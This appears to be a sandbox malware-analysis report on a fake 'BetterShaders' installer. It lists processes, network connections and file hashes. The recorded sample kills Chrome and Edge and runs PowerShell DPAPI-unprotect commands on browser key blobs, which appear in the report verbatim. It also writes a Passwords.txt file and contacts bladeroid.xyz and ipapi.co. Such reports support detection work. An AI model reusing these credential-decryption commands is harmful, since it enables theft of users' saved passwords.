"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5460 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=5832 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5784 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5976 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4604 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=5652 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=4636 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=5788 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5540 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5708 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5556 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3352 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5868 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Downloads\7z2406-x64.exe

"C:\Users\Admin\Downloads\7z2406-x64.exe"

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\BetterShaders_3.8.0.rar"

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO08151249\README.txt

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4576 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:2

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO08159F69\README.txt

C:\Users\Admin\Desktop\BetterShaders 3.8.0.exe

"C:\Users\Admin\Desktop\BetterShaders 3.8.0.exe"

C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe

C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"

C:\Windows\system32\taskkill.exe

taskkill /IM chrome.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"

C:\Windows\system32\taskkill.exe

taskkill /IM msedge.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,158,56,123,155,119,128,226,65,189,77,45,80,19,37,26,47,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,143,8,155,162,221,184,73,71,232,222,51,145,193,115,97,9,130,241,224,103,6,120,76,14,50,215,61,172,124,159,238,253,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,99,253,1,12,244,37,76,196,250,204,121,176,50,84,44,171,164,192,123,43,73,12,147,211,193,42,15,39,95,26,62,201,48,0,0,0,199,59,41,134,72,150,192,161,125,143,33,114,13,155,6,139,72,133,43,120,135,38,24,218,101,6,176,207,210,73,64,67,238,175,209,152,192,141,196,93,4,159,79,39,108,201,81,243,64,0,0,0,47,182,203,76,22,230,198,116,189,169,35,195,147,254,206,160,141,223,22,83,122,129,208,253,101,155,106,250,254,105,139,55,133,60,233,210,239,137,168,177,165,144,32,46,241,126,232,206,117,88,178,220,23,105,81,227,111,16,111,158,78,1,233,96), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,158,56,123,155,119,128,226,65,189,77,45,80,19,37,26,47,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,143,8,155,162,221,184,73,71,232,222,51,145,193,115,97,9,130,241,224,103,6,120,76,14,50,215,61,172,124,159,238,253,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,99,253,1,12,244,37,76,196,250,204,121,176,50,84,44,171,164,192,123,43,73,12,147,211,193,42,15,39,95,26,62,201,48,0,0,0,199,59,41,134,72,150,192,161,125,143,33,114,13,155,6,139,72,133,43,120,135,38,24,218,101,6,176,207,210,73,64,67,238,175,209,152,192,141,196,93,4,159,79,39,108,201,81,243,64,0,0,0,47,182,203,76,22,230,198,116,189,169,35,195,147,254,206,160,141,223,22,83,122,129,208,253,101,155,106,250,254,105,139,55,133,60,233,210,239,137,168,177,165,144,32,46,241,126,232,206,117,88,178,220,23,105,81,227,111,16,111,158,78,1,233,96), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,158,56,123,155,119,128,226,65,189,77,45,80,19,37,26,47,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,204,23,200,182,199,212,101,234,51,160,20,157,150,146,144,151,39,93,3,161,164,186,212,226,57,101,160,86,167,155,8,7,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,184,144,186,180,174,237,163,184,95,232,101,63,21,177,75,98,215,199,36,30,80,192,146,63,77,115,21,70,102,42,166,165,48,0,0,0,117,126,67,77,96,159,142,116,174,11,86,56,11,231,226,145,7,63,8,207,34,20,54,206,115,112,214,184,19,252,2,122,95,58,116,12,104,15,223,163,49,195,63,147,96,226,86,246,64,0,0,0,114,72,103,37,120,230,180,221,228,136,240,64,66,22,120,71,192,126,130,46,213,57,1,27,188,210,151,225,138,111,6,223,99,131,127,243,133,142,61,229,60,15,180,41,8,227,3,169,15,181,32,167,8,219,218,233,217,48,253,19,227,158,119,122), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,158,56,123,155,119,128,226,65,189,77,45,80,19,37,26,47,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,204,23,200,182,199,212,101,234,51,160,20,157,150,146,144,151,39,93,3,161,164,186,212,226,57,101,160,86,167,155,8,7,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,184,144,186,180,174,237,163,184,95,232,101,63,21,177,75,98,215,199,36,30,80,192,146,63,77,115,21,70,102,42,166,165,48,0,0,0,117,126,67,77,96,159,142,116,174,11,86,56,11,231,226,145,7,63,8,207,34,20,54,206,115,112,214,184,19,252,2,122,95,58,116,12,104,15,223,163,49,195,63,147,96,226,86,246,64,0,0,0,114,72,103,37,120,230,180,221,228,136,240,64,66,22,120,71,192,126,130,46,213,57,1,27,188,210,151,225,138,111,6,223,99,131,127,243,133,142,61,229,60,15,180,41,8,227,3,169,15,181,32,167,8,219,218,233,217,48,253,19,227,158,119,122), $null, 'CurrentUser')

C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe

"C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1976,i,10264147517545638518,16886805474116344667,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1968 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe

"C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --field-trial-handle=2184,i,10264147517545638518,16886805474116344667,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2180 /prefetch:3

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\Passwords.txt

C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe

"C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2036,i,10264147517545638518,16886805474116344667,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1872 /prefetch:8

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\Passwords.txt

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 bettershaders.com udp
TR 31.186.11.158:443 bettershaders.com tcp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 158.11.186.31.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 www.google.com udp
FR 216.58.215.36:443 www.google.com udp
US 8.8.8.8:53 131.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 170.20.217.172.in-addr.arpa udp
US 8.8.8.8:53 36.215.58.216.in-addr.arpa udp
US 8.8.8.8:53 163.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
FR 172.217.20.174:443 play.google.com udp
FR 172.217.20.174:443 play.google.com tcp
US 8.8.8.8:53 174.20.217.172.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
FR 216.58.213.78:443 clients2.google.com udp
FR 216.58.213.78:443 clients2.google.com tcp
US 8.8.8.8:53 78.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 67.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 162.20.217.172.in-addr.arpa udp
US 8.8.8.8:53 practicetestautomation.com udp
US 162.241.225.48:443 practicetestautomation.com tcp
US 162.241.225.48:443 practicetestautomation.com tcp
US 8.8.8.8:53 i0.wp.com udp
US 8.8.8.8:53 stats.wp.com udp
US 8.8.8.8:53 v0.wordpress.com udp
US 192.0.76.3:443 stats.wp.com tcp
US 192.0.77.2:443 i0.wp.com tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
FR 172.217.18.202:443 content-autofill.googleapis.com tcp
US 192.0.77.2:443 i0.wp.com udp
US 8.8.8.8:53 48.225.241.162.in-addr.arpa udp
US 8.8.8.8:53 42.215.58.216.in-addr.arpa udp
US 8.8.8.8:53 3.76.0.192.in-addr.arpa udp
US 8.8.8.8:53 2.77.0.192.in-addr.arpa udp
US 8.8.8.8:53 202.18.217.172.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 vbsca.ca udp
CA 163.182.194.25:80 vbsca.ca tcp
CA 163.182.194.25:80 vbsca.ca tcp
FR 172.217.18.202:443 content-autofill.googleapis.com udp
US 8.8.8.8:53 25.194.182.163.in-addr.arpa udp
CA 163.182.194.25:80 vbsca.ca tcp
US 8.8.8.8:53 pixel.wp.com udp
FR 172.217.18.202:443 content-autofill.googleapis.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
FR 216.58.215.35:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 35.215.58.216.in-addr.arpa udp
FR 216.58.215.36:443 www.google.com udp
TR 31.186.11.158:443 bettershaders.com tcp
TR 31.186.11.158:443 bettershaders.com tcp
US 8.8.8.8:53 bit.ly udp
US 67.199.248.10:443 bit.ly tcp
US 67.199.248.10:443 bit.ly tcp
US 8.8.8.8:53 cdn.gilcdn.com udp
GB 18.172.89.82:443 cdn.gilcdn.com tcp
US 8.8.8.8:53 10.248.199.67.in-addr.arpa udp
US 8.8.8.8:53 82.89.172.18.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
FR 172.217.20.174:443 play.google.com udp
US 8.8.8.8:53 id.google.com udp
FR 142.250.201.163:443 id.google.com tcp
US 8.8.8.8:53 i.ytimg.com udp
FR 142.250.75.246:443 i.ytimg.com tcp
FR 142.250.75.246:443 i.ytimg.com tcp
FR 142.250.75.246:443 i.ytimg.com tcp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 163.201.250.142.in-addr.arpa udp
US 8.8.8.8:53 246.75.250.142.in-addr.arpa udp
FR 142.250.179.110:443 www.youtube.com tcp
FR 142.250.75.246:443 i.ytimg.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 static.doubleclick.net udp
FR 142.250.178.130:443 googleads.g.doubleclick.net tcp
FR 142.250.75.230:443 static.doubleclick.net tcp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
FR 142.250.178.130:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 110.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 130.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 230.75.250.142.in-addr.arpa udp
US 8.8.8.8:53 www.7-zip.org udp
DE 49.12.202.237:443 www.7-zip.org tcp
DE 49.12.202.237:443 www.7-zip.org tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 237.202.12.49.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 208.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 192.178.49.195:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 195.49.178.192.in-addr.arpa udp
US 192.178.49.195:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 bladeroid.xyz udp
US 8.8.8.8:53 ipapi.co udp
US 172.67.69.226:443 ipapi.co tcp
US 172.67.214.44:443 bladeroid.xyz tcp
US 172.67.214.44:443 bladeroid.xyz tcp
US 172.67.214.44:443 bladeroid.xyz tcp
US 172.67.214.44:443 bladeroid.xyz tcp
US 172.67.214.44:443 bladeroid.xyz tcp
US 172.67.214.44:443 bladeroid.xyz tcp
US 8.8.8.8:53 226.69.67.172.in-addr.arpa udp
US 8.8.8.8:53 44.214.67.172.in-addr.arpa udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 87f7abeb82600e1e640b843ad50fe0a1
SHA1 045bbada3f23fc59941bf7d0210fb160cb78ae87
SHA256 b35d6906050d90a81d23646f86c20a8f5d42f058ffc6436fb0a2b8bd71ee1262
SHA512 ea8e7f24ab823ad710ce079c86c40aa957353a00d2775732c23e31be88a10d212e974c4691279aa86016c4660f5795febf739a15207833df6ed964a9ed99d618

\??\pipe\LOCAL\crashpad_2388_GJCWGZGRNZIMQVFN

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f61fa5143fe872d1d8f1e9f8dc6544f9
SHA1 df44bab94d7388fb38c63085ec4db80cfc5eb009
SHA256 284a24b5b40860240db00ef3ae6a33c9fa8349ab5490a634e27b2c6e9a191c64
SHA512 971000784a6518bb39c5cf043292c7ab659162275470f5f6b632ea91a6bcae83bc80517ceb983dd5abfe8fb4e157344cb65c27e609a879eec00b33c5fad563a6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 a0c8e5189f4d98cca7066dfc2b302655
SHA1 3c3af8f88fbc55595bb727ca3cb9375cc2ddc6e6
SHA256 c42d1aa4d0a7773e20d1f7a7cfd96f2438411e228229ab003af7a48a9aa9351b
SHA512 ad6a69ae76cbf988018d4459b1026d103dd163b06edde4d8374de8d562ffae4592be52dfc1cd29ea3cc12cf3dfbe3eb49d4577c91178acbc464f9fb728a39090

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 c23170f1686e7eff40c7de5fe5c8dbc7
SHA1 94138bf39f3192324bd4f38fe0c00906e5f97787
SHA256 4b0defc99c3e75deeb0ba9df02a6dc1e54b1b98cd3939b7c784b145c950f1274
SHA512 a168d87e711453d8eea34da8d23ee2f32874da420057658fe7222c22f686c986f3532324934ae9bffcc42d742182b9a4cc784c1562882b127bb236ac2953f005

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 29615129d90af10023680f9290129b92
SHA1 6db601d87d5ba5fae0b7b46e8715c334df9377ad
SHA256 6358b6f7db2528741d0d9caf0a104fe7d1676b86d7b11320a91a15247a7a1b4b
SHA512 c84b6ddb4c4aa25d0b67ffccc3801bb743f22df568900f2c49e7468e229e7f06d32c8f400dcf7d813bd372114c3f9e85ea7cafb467e923f63588b8774efc7595

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 07c899f72a3748cd856a3043752d4d99
SHA1 4053e4a9f635cee5a15a715c5d547d06aff4b2a5
SHA256 a8adb979d36882b0b0a4cd11c9a2365b2df5c85af705fd10a07eebef832c41e5
SHA512 23cdbd35d8aaba4d1f48ba9efdc80aadd79548bdddbb3a0ac98aa002f9459724103bd698e1d30a8fddcd605674487a644ad185ca136a50392b8cd375b1996774

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 686523bcaf0a2931476844c2ff64ddb1
SHA1 75dd91ccf3c1c83aee32de06e21638ad23826aca
SHA256 0a2e845e384ca9ae2f52102aaa1ef0cc86e994d30aff363b74f5f44bae4addc5
SHA512 d5aa23a5850f4358760cc4c115b45d43e43a6e48383fcccab6f04fbd967ac136f0b4d416b843f706df861405273b36b79b0462980d2951130cbf6112828a3357

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 9630960cfa3e74ce1fb218a1606f9d74
SHA1 466925ce96bfe199810e576cb9a91fa859b9a8b3
SHA256 fa9b9720228880896daf4308358396d56b8f43276a3473022792fe1e9b0c199e
SHA512 824a50ceb8e229fad76f0600d25370f85c3fc17df43f392f051ce75fec9ef5bbda3801d5d797a987330147c2d39863e00f19b2af9e5d4f71470e02d5b20e26f0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 ee833fec78bd573a12be4211ab5f412c
SHA1 0415b96c9713a3700bab2da2961c39be1795af82
SHA256 609310f434798269b06fd95489c821a14038df18544f95f170fd59b8084278ec
SHA512 d01c358625aaa19eaa481bde2af64933e9afba244cd09018e01c1f1185bebce1b5d4d05c70de1bf498fa3185fcbe47c80a835433f893d489a8f56f4e2883cb30

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 125eff0fccd89d839a4773269bf6395e
SHA1 f327a063865025fd1dfe2582450aefbc220444fe
SHA256 8b30801101c2cb20900943af3c818835660764e66372288e2df2e20352e5e8d1
SHA512 cbdaf1a891f21a95d00aa16d8d07d907e545dbabef550b2034c91599a06dee08cdee84e90eb00d16f73165d80f5613f5aea087d9d5e48e1c77a305dd449469de

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 e773735d6d6a984b4b964a4010c4668b
SHA1 0106f69cc9f34379e7c9d983cf82b075b7861a6c
SHA256 f841b50defecffa34851fddb6934922b137313d97a39ec3100ee9e50fc4f4894
SHA512 207d2b3b0225e8166e97cd2cc9c1842f98c6fc643af1678363eb63db76fdf3e7c4dff117e8fc8e2850254180574d1a4734978c2e29bc225c7266b70ad0e497bc

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 6fb988499baf826b505a0bbdd01f02cd
SHA1 0b2a3dde6cc8e322c2c23570a59ec0cb99b96b43
SHA256 8b75475f95d1b7e2faab8f2a7e3ab2d92fe938d3ef8bc0396354f546c289c972
SHA512 ddcbbc9107066e72797e466c808cede3b51dd8c87b234ba211de4c521de7517a919180d9b62192f012eef75929a2b013535ec74b0d44990f923e896ecedbbfae

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 09efeace3c5e18468b2bfe2a443c2dc5
SHA1 575e9a25aa33d3efddd60364883e04a874465c51
SHA256 36963daa5d42de6ddbaa465968353087ab855169c75bb655dd2697a4bc0622b7
SHA512 e5427c2b9701c0df08747aefde9970c760295970b692b0c4f35b3f10e63b0009221b3e5cdb042e6b18c34bf23cdf2fce36fb6556fbdf4ace678d25b6675a9afe

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 a0404c27140cc5fa5d98deb257d26299
SHA1 e5a1efe94fe09fe67534e264ce22f1c3e1486942
SHA256 25e962c19a9abfd25207d63cd29d612d3eace851c366fc4f1c72e56773673c15
SHA512 fcca074c751426befb8fe216c8111b332ce52e02507584339107f8781ba574a000c8214a4e53d39d503f16159864e53fd2c7cb91b4f36a1bebc8a64872e6c32d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 8545b60d7be04e2dc8cee582a4f57af1
SHA1 5d92a57ba7085a9a6acc486e0051382ed9a4ea6b
SHA256 6b1d77dcd2a984f09bbca7febce1c33c959acfce2dd644fa934123b8267dbb11
SHA512 da948902c16b2ce5183c55f58e475586b55f341ffbab632e9d4f2627d76360270d3fbd01e163724e7c8842e5e52c4815eec517ca14070a0a76c68aaf59fb3e13

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 7a850d411efe6fb69774a96faace0b48
SHA1 b4916f53decb100b424cf7b50ee1f903523ee511
